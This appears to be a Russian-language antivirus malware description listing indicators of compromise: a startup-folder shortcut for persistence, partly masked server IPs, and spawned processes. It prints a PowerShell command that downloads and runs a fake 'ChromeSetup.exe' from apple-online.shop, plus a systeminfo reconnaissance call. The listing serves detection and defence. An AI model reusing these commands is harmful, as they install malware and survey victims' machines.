Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\fahhs.lnk
- '21#.#48.142.19':443
- '65.##.120.47':443
- '65.##.120.47':443
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/ChromeSetup.exe\" -OutFile \"$env:TMP/ChromeSetup.exe\" ; & \"$env:TMP/ChromeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combin...
- '<SYSTEM32>\cmd.exe' /c systeminfo
- '<SYSTEM32>\systeminfo.exe'